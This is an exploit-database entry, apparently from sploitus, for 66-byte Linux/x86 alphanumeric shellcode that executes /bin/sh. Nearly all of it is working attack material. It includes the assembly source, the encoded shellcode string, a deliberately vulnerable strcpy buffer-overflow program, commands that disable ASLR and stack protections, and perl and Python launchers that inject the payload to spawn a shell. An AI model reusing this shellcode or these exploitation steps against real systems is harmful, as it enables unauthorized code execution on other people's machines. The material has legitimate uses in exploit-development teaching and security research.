Exploit for Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)

Name: Exploit for Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
Rating: 5 (40 reviews)
2020-01-06 | CVSS 0.4
## https://sploitus.com/exploit?id=1337DAY-ID-33776
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
# Shellcode Author: bolonobolo
# Tested on: Linux x86

######################## execve.asm ###############################
global _start			

section .text
_start:

       ; int 0x80 ------------
       push 0x30
       pop eax
       xor al, 0x30
       push eax
       pop edx
       dec eax
       xor ax, 0x4f73
       xor ax, 0x3041
       push eax
       push edx
       pop eax
       ;----------------------
       push edx
       push 0x68735858
       pop eax
       xor ax, 0x7777
       push eax
       push 0x30
       pop eax
       xor al, 0x30
       xor eax, 0x6e696230
       dec eax
       push eax

       ; pushad/popad to place /bin/sh in EBX register
       push esp
       pop eax
       push edx
       push ecx
       push ebx
       push eax
       push esp
       push ebp
       push esi
       push edi
       popad
       push eax
       pop ecx
       push ebx

       xor al, 0x4a
       xor al, 0x41

######################## ASCII string ##########################

j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A

########################## bof.c ####################

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

  int main(int argc, char *argv[]){
    char buffer[128];
    strcpy(buffer,  argv[1]);
    return 0;
  }


When you test it on new kernels remember to disable the
randomize_va_space and to compile the C program with execstack enabled
and the stack protector disabled

# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
# sysctl -p
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
bof.c -o bof


###################################################################

./bof `perl -e 'print "\x90"x48 .
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`

The \x79\xf7\xff\xbf may change, you must find yourself an address in
the NOP befor the shellcode

#################### alpha.py ############################

#!/usr/bin/python
import os

print "[*] Loading NOP"
z = "\x90"*48
print "[*] Loading alphanumeric"
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
print "[*] Loading syscall"
z += "D"*16
print "[*] Loading JMP and landing address"
z += "\xff\xe4\x79\xf7\xff\xbf"
print "[*] Popping the shell..."
os.system("./bof " + z)


##################################################################